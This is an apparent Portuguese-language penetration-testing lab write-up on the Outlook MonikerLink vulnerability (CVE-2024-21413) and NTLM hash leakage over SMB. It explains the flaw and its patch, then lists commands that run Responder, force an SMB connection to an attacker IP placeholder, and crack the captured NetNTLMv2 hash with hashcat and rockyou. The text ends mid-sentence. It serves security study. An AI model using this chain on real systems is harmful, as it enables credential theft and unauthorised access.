
Laboratorio criado para PenTest da Vuln CVE 2024-214113(MONIKER LINK).
Este projeto teve como objetivo estudar a vulnerabilidade CVE-2024-21413 (MonikerLink), explorando como o protocolo SMB/NTLM pode ser abusado para captura de credenciais.
Mesmo após a correção oficial da Microsoft, o laboratório mostra que o conceito continua válido em cenários internos.
A vulnerabilidade (CVE-2024-21413), conhecida como MonikerLink, foi classificada como crítica (CVSS 9.8). Ela ocorre porque o Outlook processava links "file://" de forma insegura, utilizando APIs antigas de COM (Moniker Objects). Esses objetos permitiam que o Outlook chamasse recursos externos sem passar pela Protected View, induzindo o cliente a iniciar conexões SMB automaticamente.
É um recurso do Windows que permite referenciar objetos COM por meio de links especiais.
O exploit original abusava de links "file://" ou UNC paths enviados por e-mail.
Ao adicionar o caractere "!" no link, era possível contornar proteções internas do Outlook, forçando a abertura direta do recurso externo.
Isso resultava em autenticação NTLM automática, expondo hashes NetNTLMv2 ao atacante sem interação significativa do usuário.
O patch KB5002519 bloqueia especificamente esse comportamento no Outlook, impedindo que links "file://" sejam processados dessa forma.
No entanto, o NTLM automático do Windows continua funcionando fora do contexto do Outlook, ou seja, qualquer tentativa de acessar recursos SMB em ambiente onde NTLM está habilitado e não há restrições de autenticação ainda pode gerar envio automático de hashes.
📌 Relação entre Outlook, SMB/NTLM e Responder Exploit original: via spam de e-mail com link malicioso → Outlook processava → NTLM autenticava automaticamente → atacante recebia hash.
Laboratório interno: simulamos apenas a parte conceitual → forçamos manualmente a conexão SMB → Responder capturou o hash → Hashcat realizou o cracking.
Por que ainda funciona? Porque o NTLM é um protocolo legado que autentica automaticamente em conexões SMB, independentemente do Outlook. O patch corrige o cliente Outlook, mas não elimina o comportamento do NTLM no windows


Durante os testes, o Outlook bloqueou links file:// vindos de e-mail, exibindo alerta de segurança:

O patch KB5002519, lançado em fevereiro de 2024, mitiga o vetor externo via e-mail ao bloquear links file://.
No entanto, o protocolo NTLM continua permitindo autenticação automática em conexões SMB.
Isso significa que, embora o Outlook esteja protegido contra este exploit específico, a superfície de ataque interna permanece válida.
A raiz da questão está na dependência do NTLM como mecanismo de autenticação, que continua suscetível a captura de hashes em conexões SMB.
sudo responder -I eth0

Via Explorer, acessando manualmente:
\\<IP do atacante>\test.

Via terminal (cmd ou PowerShell), usando o comando:
net use \\<IP do atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
Nota:
A senha real não é exibida por questões de segurança. O objetivo é demonstrar o processo e a vulnerabilidade.

Este laboratório evidenciou que: